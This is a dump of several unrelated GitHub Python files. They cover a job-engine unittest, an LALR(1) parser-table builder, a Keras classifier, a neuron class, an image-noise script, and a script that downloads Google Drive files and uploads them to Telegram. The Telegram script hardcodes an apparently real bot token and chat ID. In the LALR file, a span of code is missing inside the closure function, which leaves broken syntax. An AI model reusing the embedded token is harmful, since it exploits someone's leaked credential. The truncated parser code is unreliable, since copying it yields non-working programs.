+{"seq_id":"33105698584","text":"import unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom nuvla.job.distribution import DistributionBase\nfrom nuvla.job.distributions.handle_trial_end import \\\n HandleTrialEndJobsDistribution, \\\n build_filter_customers\n\n\nclass TestHandleTrialEndJobsDistribution(unittest.TestCase):\n\n def setUp(self):\n self.patcher = patch.object(DistributionBase, '_start_distribution')\n self.mock_object = self.patcher.start()\n\n def tearDown(self):\n self.patcher.stop()\n\n @patch.object(HandleTrialEndJobsDistribution, 'list_trials')\n def test_list_customer_ids(self, mock_list_trials):\n obj = HandleTrialEndJobsDistribution(MagicMock())\n mock_list_trials.return_value = []\n trial_1 = {'id': 'sub_1',\n 'customer': 'cus_1'}\n trial_2 = {'id': 'sub_2',\n 'customer': 'cus_2'}\n self.assertListEqual(\n [], obj.list_customer_ids())\n mock_list_trials.return_value = [trial_1]\n self.assertListEqual(\n ['cus_1'], obj.list_customer_ids())\n mock_list_trials.return_value = [trial_1, trial_2]\n self.assertListEqual(\n ['cus_1', 'cus_2'], obj.list_customer_ids())\n mock_list_trials.return_value = [trial_1, trial_2, {}]\n self.assertListEqual(\n ['cus_1', 'cus_2'], obj.list_customer_ids(),\n 'should not fail even if trials is missing ids')\n\n def test_build_filter_customers(self):\n self.assertEqual(\n '(customer-id=\"1\" or customer-id=\"2\" or customer-id=\"3\")',\n build_filter_customers(['1', '2', '3']))\n\n @patch.object(HandleTrialEndJobsDistribution, 'search_customers')\n @patch('nuvla.job.distributions.handle_trial_end.build_filter_customers')\n def test_get_customers(self,\n 
mock_build_filter_customers,\n mock_search_customers):\n obj = HandleTrialEndJobsDistribution(MagicMock())\n trial_1 = {'id': '1'}\n trial_2 = {'id': '2'}\n customer_1 = {'id': 'customer/1'}\n customer_2 = {'id': 'customer/2'}\n\n mock_build_filter_customers.return_value = ''\n obj._trials = [trial_2]\n self.assertListEqual([], obj.get_customers(),\n 'search customers without filter is not executed')\n\n mock_build_filter_customers.return_value = 'subscription-id=\"2\"'\n mock_search_customers.return_value = [customer_2]\n self.assertListEqual([customer_2], obj.get_customers())\n\n obj._trials = [trial_1, trial_2]\n mock_search_customers.return_value = [customer_1, customer_2]\n self.assertListEqual([customer_1, customer_2],\n obj.get_customers())\n","repo_name":"nuvla/job-engine","sub_path":"code/tests/nuvla/job/distributions/handle_trial_end_test.py","file_name":"handle_trial_end_test.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"17372999647","text":"from collections import deque\nfrom collections import OrderedDict\nfrom pprint import pprint\nimport firstfollow\nfrom firstfollow import production_list, nt_list as ntl, t_list as tl\nimport string_validating\nimport sys\n\nnt_list, t_list=[], []\nfinal=[]\n\n\n\nclass State:\n\t_id=0\n\tdef __init__(self, closure):\n\t\tself.closure=closure\n\t\tself.no=State._id\n\t\tState._id+=1\n\nclass Item(str):\n\tdef __new__(cls, item, lookahead=list()):\n\t\tself=str.__new__(cls, item)\n\t\tself.lookahead=lookahead\n\t\treturn self\n\n\tdef __str__(self):\n\t\treturn super(Item, self).__str__()+\", \"+'|'.join(self.lookahead)\n\t\t\n\ndef closure(items): #just make new produces sentences, items= closure\n\n\tdef exists(newitem, items):\n\t\tfor i in items:\n\t\t\tif i==newitem and sorted(set(i.lookahead))==sorted(set(newitem.lookahead)):\n\t\t\t\treturn True\n\t\treturn False\n\n\n\tglobal production_list\n\n\twhile True:\n\t\tflag=0\n\t\tfor i in items:\t\n\t\t\t\n\t\t\tif i.index('.')==len(i)-1: continue\n\n\t\t\tY=i.split('->')[1].split('.')[1][0]\t\t\t# \n\n\t\t\tif i.index('.')+1')\n\t\t\t\t\n\t\t\t\tif head!=Y: continue\n\t\t\t\t\n\t\t\t\tnewitem=Item(Y+'->.'+body, lastr)\n\n\t\t\t\tif not exists(newitem, items):\n\t\t\t\t\titems.append(newitem)\n\t\t\t\t\tflag=1\n\t\tif flag==0: break\n\n\treturn items\n\ndef goto(items, symbol):\t\t\t# move ' . 
' one further\n\n\tglobal production_list\n\tinitial=[]\n\n\tfor i in items:\n\t\tif i.index('.')==len(i)-1: continue\n\n\t\thead, body=i.split('->')\n\t\tseen, unseen=body.split('.')\n\n\n\t\tif unseen[0]==symbol and len(unseen) >= 1:\n\t\t\tinitial.append(Item(head+'->'+seen+unseen[0]+'.'+unseen[1:], i.lookahead))\n\n\treturn closure(initial)\n\n\ndef calc_stateslalr1():\n\tglobal final\n\tdef contains(states, t):\n\n\t\tfor s in states:\n\t\t\tif len(s) != len(t): continue\n\n\t\t\tif sorted(s)==sorted(t):\n\t\t\t\tfor i in range(len(s)):\n\t\t\t\t\ts[i].lookahead = list(set(s[i].lookahead + t[i].lookahead))\n\t\t\t\t\t# print(s[i].lookahead)\n\t\t\t\treturn True\n\n\t\treturn False\n\n\tglobal production_list, nt_list, t_list\n\n\thead, body=production_list[0].split('->')\n\n\n\tstates=[closure([Item(head+'->.'+body, ['$'])])]\n\t\n\twhile True:\n\t\tflag=0\n\t\tfor s in states:\n\n\t\t\tfor e in nt_list+t_list:\n\t\t\t\t\n\t\t\t\tt=goto(s, e)\n\t\t\t\tif t == [] or contains(states, t): continue\n\n\t\t\t\tstates.append(t)\n\t\t\t\tflag=1\n\n\t\tif not flag: break\n\t\n\treturn states \n\ndef make_tablelalr1(states):\n\n\tglobal nt_list, t_list\n\n\tdef getstateno(t):\n\n\t\tfor s in states:\n\t\t\tif len(s.closure) != len(t): continue\n\n\t\t\tif sorted(s.closure)==sorted(t):\n\t\t\t\treturn s.no\n\n\t\treturn -1\n\n\tdef getprodno(closure):\n\n\t\tclosure=''.join(closure).replace('.', '')\n\t\treturn production_list.index(closure)\n\n\tSLR_Table=OrderedDict()\n\t\n\tfor i in range(len(states)):\n\t\tstates[i]=State(states[i])\n\n\tfor s in states:\n\t\tSLR_Table[s.no]=OrderedDict()\n\n\t\tfor item in s.closure:\n\t\t\thead, body=item.split('->')\n\t\t\tif body=='.': \n\t\t\t\tfor term in item.lookahead: \n\t\t\t\t\tif term not in SLR_Table[s.no].keys():\n\t\t\t\t\t\tSLR_Table[s.no][term]={'r'+str(getprodno(item))}\n\t\t\t\t\telse: SLR_Table[s.no][term] |= {'r'+str(getprodno(item))}\n\t\t\t\tcontinue\n\n\t\t\tnextsym=body.split('.')[1]\n\t\t\tif nextsym=='':\n\t\t\t\tif getprodno(item)==0:\n\t\t\t\t\tSLR_Table[s.no]['$']='accept'\n\t\t\t\telse:\n\t\t\t\t\tfor term in item.lookahead: \n\t\t\t\t\t\tif term not in SLR_Table[s.no].keys():\n\t\t\t\t\t\t\tSLR_Table[s.no][term]={'r'+str(getprodno(item))}\n\t\t\t\t\t\telse: SLR_Table[s.no][term] |= {'r'+str(getprodno(item))}\n\t\t\t\tcontinue\n\n\t\t\tnextsym=nextsym[0]\n\t\t\tt=goto(s.closure, nextsym)\n\t\t\tif t != []: \n\t\t\t\tif nextsym in t_list:\n\t\t\t\t\tif nextsym not in SLR_Table[s.no].keys():\n\t\t\t\t\t\tSLR_Table[s.no][nextsym]={'s'+str(getstateno(t))}\n\t\t\t\t\telse: SLR_Table[s.no][nextsym] |= {'s'+str(getstateno(t))}\n\n\t\t\t\telse: SLR_Table[s.no][nextsym] = str(getstateno(t))\n\tfor st in SLR_Table:\n\t# print(dict(SLR_Table[st]))\n\t\tfinal.append(dict(SLR_Table[st]))\n\treturn SLR_Table\n\ndef augment_grammar():\n\n\t#for i in range(ord('Z'), ord('A')-1, -1):\n#\t\tif chr(i) not in nt_list:\n#\t\t\tstart_prod=production_list[0]\n#\t\t\tproduction_list.insert(0, chr(i)+'->'+start_prod.split('->')[0]) \n#\t\t\treturn\n\tproduction_list.insert(0, \"S'\"+'->'+production_list[0].split('->')[0]) \n\ndef main():\n\n\tglobal production_list, ntl, nt_list, tl, t_list\t\n\n\tfirstfollow.main()\n\n\t# print(\"\\tFIRST AND FOLLOW OF NON-TERMINALS\")\n\t# for nt in ntl:\n\t# \tfirstfollow.compute_first(nt)\n\t# \tfirstfollow.compute_follow(nt)\n\t# \tprint(nt)\n\t# \tprint(\"\\tFirst:\\t\", firstfollow.get_first(nt))\n\t# \tprint(\"\\tFollow:\\t\", firstfollow.get_follow(nt), 
\"\\n\")\t\n\t\n\n\taugment_grammar()\n\tnt_list=list(ntl.keys())\n\tt_list=list(tl.keys()) + ['$']\n\n\t# print(nt_list)\n\t# print(t_list)\n\n\tj=calc_stateslalr1()\n\n\t# ctr=0\n\t# for s in j:\n\t# \t# print(\"Item{}:\".format(ctr))\n\t# \tfor i in s:\n\t# \t\t# print(\"\\t\", i)\n\t# \tctr+=1\n\n\ttable=make_tablelalr1(j)\n\t# print(\"table \")\n\n\tprint(\"\\n===== TABLE =====\\n\")\n\n\tsr, rr=0, 0\n\n\tfor i, j in table.items():\n\t\t# print(i, \"\\t\", j)\n\t\ts, r=0, 0\n\n\t\tfor p in j.values():\n\t\t\tif p!='accept' and len(p)>1:\n\t\t\t\tp=list(p)\n\t\t\t\tif('r' in p[0]): r+=1\n\t\t\t\telse: s+=1\n\t\t\t\tif('r' in p[1]): r+=1\n\t\t\t\telse: s+=1\t\t\n\t\tif r>0 and s>0: sr+=1\n\t\telif r>0: rr+=1\n\n\n\n\n\n\t# sys.stdout.write('.')\n\tsys.stdout.write(\"\\t{}\\t{}\\n\".format('\\t'.join(t_list), '\\t'.join(nt_list)))\n\n\tfor i, j in table.items():\n\t\t\tsys.stdout.write(\"\\n{}\\t\".format(i))\n\t\t\tfor sym in t_list+nt_list:\n\t\t\t\tif sym in table[i].keys():\n\t\t\t\t\tif type(table[i][sym])!=type(set()): \n\t\t\t\t\t\tsys.stdout.write(\"{}\\t\".format(table[i][sym]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tsys.stdout.write(\"{}\\t\".format(', '.join(table[i][sym])))\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write(\"\\t\")\n\t\t\tsys.stdout.write(\"\\n\")\n\t\t\ts, r=0, 0\n\n\t\t\tfor p in j.values():\n\t\t\t\tif p!='accept' and len(p)>1:\n\t\t\t\t\tp=list(p)\n\t\t\t\t\tif('r' in p[0]): r+=1\n\t\t\t\t\telse: s+=1\n\t\t\t\t\tif('r' in p[1]): r+=1\n\t\t\t\t\telse: s+=1\t\t\n\t\t\tif r>0 and s>0: sr+=1\n\t\t\telif r>0: rr+=1\n\n\tprint(\"\\n\\n\", sr, \"s/r conflicts |\", rr, \"r/r conflicts\\n\")\n\n\n\n\n\n\treturn \n\nif __name__==\"__main__\":\n\tmain()\n\tinString=input(\"please enter your string to validate : \")\n\tstring_validating.validation(firstfollow.production_list, final, inString+\"$\")\n\n\t\n\n\n\n","repo_name":"kjjam/Compiler1397","sub_path":"lalr1_backend_only.py","file_name":"lalr1_backend_only.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32224876828","text":"import pickle\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport numpy as np\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# command line flags\nflags.DEFINE_string('training_file', '', \"Bottleneck features training file (.p)\")\nflags.DEFINE_string('validation_file', '', \"Bottleneck features validation file (.p)\")\n\n\ndef load_bottleneck_data(training_file, validation_file):\n \"\"\"\n Utility function to load bottleneck features.\n\n Arguments:\n training_file - String\n validation_file - String\n \"\"\"\n print(\"Training file\", training_file)\n print(\"Validation file\", validation_file)\n\n with open(training_file, 'rb') as f:\n train_data = pickle.load(f)\n with open(validation_file, 'rb') as f:\n validation_data = pickle.load(f)\n\n X_train = train_data['features']\n y_train = train_data['labels']\n X_val = validation_data['features']\n y_val = validation_data['labels']\n\n return X_train, y_train, X_val, y_val\n\n\ndef main(_):\n # load bottleneck data\n X_train, y_train, X_val, y_val = load_bottleneck_data(FLAGS.training_file, FLAGS.validation_file)\n \n X_train=X_train.squeeze()\n y_train=y_train.squeeze()\n X_val=X_val.squeeze()\n y_val=y_val.squeeze()\n \n num_classes = len(np.unique(y_train))\n input_shape = X_train.shape[1:]\n \n print(X_train.shape, 
 dropout = .3\n batch_size = 128\n epochs = 500\n \n model = Sequential()\n model.add(Dense(256, activation='relu', input_shape=input_shape))\n model.add(Dropout(dropout))\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(dropout))\n model.add(Dense(84, activation='relu'))\n model.add(Dropout(dropout))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.compile(loss=keras.losses.sparse_categorical_crossentropy,\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n\n\n from keras.callbacks import EarlyStopping\n early_stopping = EarlyStopping(monitor='val_loss', patience=30)\n\n model.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_split=.3, \n callbacks=[early_stopping])\n \n score = model.evaluate(X_val, y_val, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n import gc; gc.collect()\n \n \n# parses flags and calls the `main` function above\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"lfiaschi/udacity-transfer-learning-lab","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38266926176","text":"import math\nimport numpy as np\nclass Neuron:\n def __init__(self, lr, actFunc, betaValue):\n self.weight = np.zeros(0)\n self.lr = lr\n self.actFunc = actFunc\n self.inputs = [] #default value\n self.target = 0 #default value\n self.sum = 0\n self.betaValue = betaValue\n self.error = 0\n\n def initNeuronWeight(self, inputs):\n self.weight = np.random.rand(inputs.shape[0] + 1)\n\n def setInput(self, inputs):\n self.inputs = inputs\n self.inputs = np.insert(self.inputs, 0, -1)\n\n def setTarget(self, target):\n self.target = target\n\n\n def activationFunc(self, sum):\n if self.actFunc == \"heaviside\":\n if sum >= 0:\n return 1.0\n else:\n return 0.0\n if self.actFunc == \"logistic\":\n beta = self.betaValue\n # clamp the exponent so math.exp cannot overflow for extreme net inputs\n if -beta*sum > 450:\n return 1/(1+math.exp(450))\n return 1/(1+math.exp(-beta*sum))\n if self.actFunc == \"sign\":\n if sum >= 0:\n return 1.0\n else:\n return -1.0\n if self.actFunc == \"relu\":\n return max(0,sum)\n if self.actFunc == \"sin\":\n return math.sin(sum)\n if self.actFunc == \"tanh\":\n return math.tanh(sum)\n if self.actFunc == \"leaky relu\":\n if sum > 0:\n return sum\n else :\n return 0.01*sum\n\n \n def derivativeActFunc(self, sum):\n if self.actFunc == \"heaviside\":\n return 1.0\n if self.actFunc == \"logistic\":\n beta = self.betaValue\n if -beta*sum > 300:\n phi = 1/(1+math.exp(300))\n else:\n phi = 1/(1+math.exp(-beta*sum))\n\n return beta*phi*(1-phi)\n if self.actFunc == \"sign\":\n return 1.0\n if self.actFunc == \"relu\":\n if sum >= 0:\n return 1.0\n else:\n return 0.0\n if self.actFunc == \"sin\":\n return math.cos(sum)\n if self.actFunc == \"tanh\":\n return math.pow(1/(math.cosh(sum)),2)\n if self.actFunc == \"leaky relu\":\n if sum > 0:\n return 1\n else :\n return 0.01\n\n #Return the output y\n def prediction(self):\n self.sum = 0\n for i in range(len(self.inputs)):\n self.sum += self.inputs[i]*self.weight[i]\n\n \n return self.activationFunc(self.sum)\n\n def train(self):\n prediction = self.prediction()\n error = self.target - prediction\n\n for i in range(len(self.weight)):\n self.weight[i] += error * self.inputs[i] * self.lr * self.derivativeActFunc(self.sum)\n\n def computeErrorOutput(self):\n prediction = self.prediction()\n
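 # Delta rule at the output unit: scale the raw error (target - prediction)\n # by the activation derivative evaluated at the last net input (self.sum).\n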
 self.error = self.derivativeActFunc(self.sum)*(self.target - prediction)\n return self.error\n\n\n def computeError(self, previousErrors, previousWeights):\n prediction = self.prediction() #keep this, to compute self.sum !!\n\n weightedErrors = 0\n for i in range(len(previousErrors)):\n weightedErrors += previousWeights[i]*previousErrors[i] \n\n self.error = self.derivativeActFunc(self.sum)*weightedErrors\n return self.error\n \n def updateWeights(self):\n # NOTE: the range starts at 1, so the bias weight (index 0) is never\n # updated here, unlike in train() above\n for i in range(1,len(self.weight)):\n self.weight[i] += self.lr * self.inputs[i] * self.error\n\n\n\n\n\n ","repo_name":"SonTonyD/Lodz_IA_introduction","sub_path":"Task3/Neuron_3.py","file_name":"Neuron_3.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"14613858404","text":"\nclass Institution(object):\n\n def __init__(self,name,location,keywords,workers,cooperate_institutions):\n self.name = name\n self.location = location\n self.keywords = keywords\n self.workers = workers\n self.cooperate_institutions = cooperate_institutions\n\n\nclass Expert(object):\n\n def __init__(self,name,keywords,cooperate_experts):\n self.name = name\n self.keywords = keywords\n self.cooperate_experts = cooperate_experts","repo_name":"sgc1993/InfomationAnalyze","sub_path":"entity/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"14479979787","text":"import cv2\nfrom SinGAN.functions import np2torch\nimport torch\n\nfilePath=\"./input.tif\"\nfolderPath=\"./\"\n\nim1 = cv2.imread(filePath)\nh= im1.shape[0]\nw= im1.shape[1]\nprint(h,w)\nimb= cv2.resize(im1,(w//3,h//3), interpolation= cv2.INTER_CUBIC)\n\ncv2.imwrite(folderPath+\"input_lr.jpg\",imb)\n#cv2.imwrite(folderPath+\"lr_nearest.jpg\",imnn)\nexit() # NOTE: everything below this exit() is currently unreachable experimentation code\nim1=imb\n\nim1 = im1/255\n\nimt= torch.from_numpy(im1)\nimt = imt.type(torch.FloatTensor)\nprint(imt)\nalpha=0.1\nimt= imt + alpha*torch.randn(imt.shape)\nimt= imt.clamp(0,1)\nimt= imt*255\nimt = imt.int()\nprint(imt)\nimtnp= imt.numpy()\ncv2.imwrite(folderPath+\"lr_noisy_\"+str(alpha)+\".png\",imtnp)\nprint(im1.shape)\n\n","repo_name":"tanmay2625/re-singan","sub_path":"add_noise.py","file_name":"add_noise.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"3904185697","text":"import asyncio  # drives the async upload helpers from module level\r\nimport os\r\nimport shutil\r\nimport io\r\nimport pickle\r\nimport telegram\r\nfrom re import search as re_search\r\nfrom urllib.parse import parse_qs, urlparse\r\nfrom os import makedirs, path as ospath, listdir, remove as osremove\r\nfrom googleapiclient.discovery import build\r\nfrom googleapiclient.errors import HttpError\r\nfrom googleapiclient.http import MediaIoBaseDownload\r\n\r\n\r\n# =================================================================\r\n# G Drive Functions\r\n# =================================================================\r\n\r\n\r\n# extract the file ID or folder ID from the link\r\ndef __getIdFromUrl(link: str):\r\n if \"folders\" in link or \"file\" in link:\r\n regex = r\"https:\\/\\/drive\\.google\\.com\\/(?:drive(.*?)\\/folders\\/|file(.*?)?\\/d\\/)([-\\w]+)\"\r\n res = re_search(regex, link)\r\n if res is None:\r\n raise IndexError(\"G-Drive ID not found.\")\r\n return res.group(3)\r\n parsed = urlparse(link)\r\n return parse_qs(parsed.query)[\"id\"][0]\r\n\r\n\r\ndef __getFilesByFolderId(folder_id):\r\n page_token = None\r\n 
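# NOTE: pages through Drive's files.list (pageSize=200) until no\r\n # nextPageToken is returned.\r\n 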
files = []\r\n while True:\r\n response = (\r\n service.files()\r\n .list(\r\n supportsAllDrives=True,\r\n includeItemsFromAllDrives=True,\r\n q=f\"'{folder_id}' in parents and trashed = false\",\r\n spaces=\"drive\",\r\n pageSize=200,\r\n fields=\"nextPageToken, files(id, name, mimeType, size, shortcutDetails)\",\r\n orderBy=\"folder, name\",\r\n pageToken=page_token,\r\n )\r\n .execute()\r\n )\r\n files.extend(response.get(\"files\", []))\r\n page_token = response.get(\"nextPageToken\")\r\n if page_token is None:\r\n break\r\n return files\r\n\r\n\r\ndef __getFileMetadata(file_id):\r\n return (\r\n service.files()\r\n .get(fileId=file_id, supportsAllDrives=True, fields=\"name, id, mimeType, size\")\r\n .execute()\r\n )\r\n\r\n\r\ndef __download_file(file_id, path):\r\n # Check if the specified file or folder exists and is downloadable.\r\n try:\r\n file = service.files().get(fileId=file_id, supportsAllDrives=True).execute()\r\n except HttpError as error:\r\n print(\"An error occurred: {0}\".format(error))\r\n file = None\r\n if file is None:\r\n print(\r\n \"Sorry, the specified file or folder does not exist or is not accessible.\"\r\n )\r\n else:\r\n if file[\"mimeType\"].startswith(\"application/vnd.google-apps\"):\r\n print(\r\n \"Sorry, the specified ID is for a Google Docs, Sheets, Slides, or Forms document. You can only download these types of files in specific formats.\"\r\n )\r\n else:\r\n # Create a BytesIO stream to hold the downloaded file data.\r\n file_contents = io.BytesIO()\r\n\r\n # Download the file or folder contents to the BytesIO stream.\r\n request = service.files().get_media(fileId=file_id, supportsAllDrives=True)\r\n file_downloader = MediaIoBaseDownload(file_contents, request)\r\n done = False\r\n while done is False:\r\n status, done = file_downloader.next_chunk()\r\n # print(f\"\\rDownload progress: {int(status.progress() * 100)}%\")\r\n file_contents.seek(0)\r\n\r\n # Save the downloaded file or folder to disk using its original name (if available).\r\n file_name = file.get(\"name\", f\"untitleddrivefile_{file_id}\")\r\n file_name = os.path.join(path, file_name)\r\n with open(file_name, \"wb\") as handle:\r\n handle.write(file_contents.getbuffer())\r\n print(f'\\nThe file \"{file_name}\" downloaded!')\r\n\r\n\r\n# Usage example\r\n# __download_file('1XQyVFHC44zso-HM2-EyLm8YeusxcqNOX', '/content/Downloads')\r\n\r\n\r\ndef __download_folder(folder_id, path):\r\n\r\n folder_meta = __getFileMetadata(folder_id)\r\n folder_name = folder_meta[\"name\"]\r\n if not ospath.exists(f\"{path}/{folder_name}\"):\r\n makedirs(f\"{path}/{folder_name}\")\r\n path += f\"/{folder_name}\"\r\n result = __getFilesByFolderId(folder_id)\r\n if len(result) == 0:\r\n return\r\n result = sorted(result, key=lambda k: k[\"name\"])\r\n for item in result:\r\n file_id = item[\"id\"]\r\n shortcut_details = item.get(\"shortcutDetails\")\r\n if shortcut_details is not None:\r\n file_id = shortcut_details[\"targetId\"]\r\n mime_type = shortcut_details[\"targetMimeType\"]\r\n else:\r\n mime_type = item.get(\"mimeType\")\r\n if mime_type == \"application/vnd.google-apps.folder\":\r\n __download_folder(file_id, path)\r\n else:\r\n __download_file(file_id, path)\r\n\r\n\r\n# =================================================================\r\n# Telegram Upload Functions\r\n# =================================================================\r\n\r\n\r\ndef get_file_type(file_path):\r\n name, extension = os.path.splitext(file_path)\r\n if extension in [\".mp4\", \".avi\", \".mkv\", \".mov\", \".webm\", 
\".m4v\"]:\r\n video_extension_fixer(file_path)\r\n return \"video\"\r\n elif extension in [\".mp3\", \".wav\", \".flac\", \".aac\", \".ogg\"]:\r\n return \"audio\"\r\n elif extension in [\".jpg\", \".jpeg\", \".png\", \".gif\"]:\r\n return \"photo\"\r\n else:\r\n return \"document\"\r\n\r\n\r\ndef video_extension_fixer(file_path):\r\n\r\n dir_path, filename = os.path.split(file_path)\r\n\r\n if filename.endswith(\".mp4\") or filename.endswith(\".mkv\"):\r\n pass\r\n # split the file name and the extension\r\n else:\r\n # rename the video file with .mp4 extension\r\n name, ext = os.path.splitext(filename)\r\n os.rename(\r\n os.path.join(dir_path, filename), os.path.join(dir_path, name + \".mp4\")\r\n )\r\n print(f\"{filename} was changed to {name}.mp4\")\r\n\r\n\r\ndef create_zip(folder_path):\r\n folder_name = os.path.basename(folder_path) # get folder name from folder path\r\n zip_file_path = folder_path # create zip file path\r\n shutil.make_archive(\r\n zip_file_path, \"zip\", folder_path\r\n ) # create zip file by archiving the folder\r\n return zip_file_path + \".zip\" # return zip file path\r\n\r\n\r\ndef size_checker(file_path):\r\n\r\n max_size = 2097152000 # 2 GB\r\n file_size = os.stat(file_path).st_size\r\n\r\n if file_size > max_size:\r\n\r\n if not ospath.exists(d_fol_path):\r\n makedirs(d_fol_path)\r\n\r\n split_zipFile(file_path, max_size)\r\n\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef split_zipFile(file_path, max_size):\r\n\r\n dir_path, filename = os.path.split(file_path)\r\n\r\n new_path = f\"{d_fol_path}/{filename}\"\r\n\r\n with open(file_path, \"rb\") as f:\r\n chunk = f.read(max_size)\r\n i = 1\r\n\r\n while chunk:\r\n # Generate filename for this chunk\r\n ext = str(i).zfill(3)\r\n output_filename = \"{}.{}\".format(new_path, ext)\r\n\r\n # Write chunk to file\r\n with open(output_filename, \"wb\") as out:\r\n out.write(chunk)\r\n\r\n # Get next chunk\r\n chunk = f.read(max_size)\r\n\r\n # Increment chunk counter\r\n i += 1\r\n\r\n\r\nasync def upload_file(file_path, type, file_name):\r\n\r\n # Upload the file\r\n try:\r\n\r\n if type == \"video\":\r\n\r\n sent = await bot.send_video(\r\n chat_id=chat_id,\r\n video=file_path,\r\n supports_streaming=True,\r\n width=480,\r\n height=320,\r\n caption=file_name,\r\n thumb=thumb_path,\r\n )\r\n\r\n elif type == \"audio\":\r\n\r\n sent = await bot.send_audio(\r\n chat_id=chat_id,\r\n audio=file_path,\r\n supports_streaming=True,\r\n caption=file_name,\r\n thumb=thumb_path,\r\n )\r\n\r\n elif type == \"document\":\r\n\r\n sent = await bot.send_document(\r\n chat_id=chat_id,\r\n document=file_path,\r\n caption=file_name,\r\n thumb=thumb_path,\r\n )\r\n\r\n elif type == \"photo\":\r\n\r\n sent = await bot.send_photo(\r\n chat_id=chat_id,\r\n photo=file_path,\r\n caption=file_name,\r\n )\r\n\r\n print(f\"\\n{file_name} Sent !\")\r\n print(f\"LOG: {sent}\")\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\n# ****************************************************************\r\n# Main Functions, function calls and variable declarations\r\n# ****************************************************************\r\n\r\n\r\n# Replace YOUR_TOKEN with your actual bot token\r\ntoken = \"5558586331:AAHcUlXjsECwp8UkreX7KgqelH0X_oXfTjc\"\r\n\r\n# Replace CHAT_ID with the chat ID of the recipient\r\nchat_id = \"-1001578391154\"\r\n\r\n# Replace FILE_PATH with the path to your media file\r\nd_path = \"/content/Downloads\"\r\n\r\nif not ospath.exists(d_path):\r\n makedirs(d_path)\r\n\r\n# Replace THUMB_PATH with the path to your 
thumb_path = \"/content/thmb.jpg\"\r\n\r\n# Create a new Telegram bot instance using the bot token\r\nbot = telegram.Bot(token=token)\r\n\r\n# create credentials object from token.pickle file\r\ncreds = None\r\nif os.path.exists(\"/content/token.pickle\"):\r\n with open(\"/content/token.pickle\", \"rb\") as token_file: # renamed so the bot token is not shadowed\r\n creds = pickle.load(token_file)\r\nelse:\r\n exit(1)\r\n\r\n# create drive API client\r\nservice = build(\"drive\", \"v3\", credentials=creds)\r\n\r\n# enter the link for the file or folder that you want to download\r\nlink = input(\"Enter the Google Drive link for the file or folder: \")\r\n\r\nfile_id = __getIdFromUrl(link)\r\n\r\nmeta = __getFileMetadata(file_id)\r\n\r\nd_name = meta[\"name\"]\r\n\r\nd_fol_path = f\"{d_path}/{d_name}\"\r\n\r\n# Determine if the ID is of file or folder\r\nif meta.get(\"mimeType\") == \"application/vnd.google-apps.folder\":\r\n __download_folder(file_id, d_path)\r\nelse:\r\n if not ospath.exists(d_fol_path):\r\n makedirs(d_fol_path)\r\n __download_file(file_id, d_fol_path)\r\n\r\nz_file_path = create_zip(d_fol_path)\r\n\r\nshutil.rmtree(d_fol_path)\r\n\r\nleech = size_checker(z_file_path)\r\n\r\nif leech: # File was split\r\n\r\n if ospath.exists(z_file_path):\r\n os.remove(z_file_path) # Delete original Big Zip file\r\n print('Big Zip File Deleted !')\r\n print('\\n\\n Now uploading multiple split zip files.............')\r\n\r\n dir_list = os.listdir(d_fol_path)\r\n\r\n for dir_path in dir_list:\r\n\r\n short_path = os.path.join(d_fol_path, dir_path)\r\n file_type = get_file_type(short_path)\r\n file_name = os.path.basename(short_path)\r\n # print(dir_path)\r\n # top-level await is a SyntaxError in a plain script, so drive the coroutine explicitly\r\n asyncio.run(upload_file(short_path, file_type, file_name))\r\n\r\nelse:\r\n\r\n print('\\nNow uploading the zip file..........................')\r\n\r\n file_type = get_file_type(z_file_path)\r\n file_name = os.path.basename(z_file_path)\r\n asyncio.run(upload_file(z_file_path, file_type, file_name))\r\n","repo_name":"etErn-A12l/Python-Leecher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
